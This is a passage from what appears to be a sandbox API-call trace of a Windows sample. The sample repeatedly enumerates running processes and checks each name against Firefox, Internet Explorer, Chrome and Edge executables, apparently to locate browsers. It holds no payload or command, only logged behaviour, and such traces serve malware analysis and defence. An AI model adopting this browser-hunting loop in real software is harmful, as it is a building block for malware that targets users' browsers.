hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.680] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0173.680] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0173.680] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0173.680] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.680] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.681] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0173.681] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0173.681] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0173.681] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.681] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.681] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0173.681] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0173.681] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0173.681] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.681] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0173.682] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0173.682] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0173.682] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0173.682] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.682] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 0 [0173.683] CloseHandle (hObject=0xd4) returned 1 [0173.683] Sleep (dwMilliseconds=0x3e8) [0174.815] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0174.817] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.818] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0174.818] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0174.818] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0174.818] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0174.818] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0174.818] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0174.818] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0174.818] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0174.818] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0174.818] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0174.819] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0174.819] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0174.819] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0174.819] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.819] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.819] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0174.819] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0174.819] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0174.819] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.819] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0174.820] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0174.820] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0174.820] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0174.820] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.820] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.820] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0174.820] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0174.820] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0174.820] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.821] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0174.821] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0174.821] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0174.821] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0174.821] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.821] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0174.822] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0174.822] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0174.822] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0174.822] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.822] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0174.822] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0174.822] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0174.822] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0174.822] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.822] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0174.823] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0174.823] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0174.823] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0174.823] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.823] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.823] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.823] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.823] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.823] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.823] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.824] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.824] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.824] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.824] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.824] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.824] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.824] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.824] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.824] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.825] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.825] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.825] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.825] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.825] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.825] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.826] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.826] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.826] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.826] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.826] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0174.826] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0174.826] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0174.826] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0174.826] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.826] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.827] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.827] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.827] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.827] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.827] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.827] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.827] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.827] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.827] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.827] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0174.828] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0174.828] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0174.828] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0174.828] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.828] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0174.828] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0174.828] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0174.828] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0174.828] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.828] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0174.829] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0174.829] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0174.829] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0174.829] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.829] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.830] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.830] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.830] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.830] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.830] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0174.830] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0174.830] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0174.830] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0174.830] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.830] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0174.831] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0174.831] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0174.831] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0174.831] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.831] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0174.831] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0174.831] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0174.831] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0174.831] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.831] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0174.832] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0174.832] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0174.832] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0174.832] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.832] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0174.832] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0174.832] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0174.833] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0174.833] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.833] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0174.833] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0174.833] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0174.833] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0174.833] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.833] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0174.834] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0174.834] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0174.834] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0174.834] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.834] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0174.834] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0174.834] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0174.834] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0174.834] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.834] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0174.835] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0174.835] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0174.835] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0174.835] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.835] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0174.835] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0174.835] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0174.835] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0174.835] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.835] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0174.836] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0174.836] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0174.836] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0174.836] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.836] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0174.836] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0174.837] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0174.837] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0174.837] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.837] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0174.837] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0174.837] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0174.837] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0174.837] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.837] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0174.838] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0174.838] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0174.838] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0174.838] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.838] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, 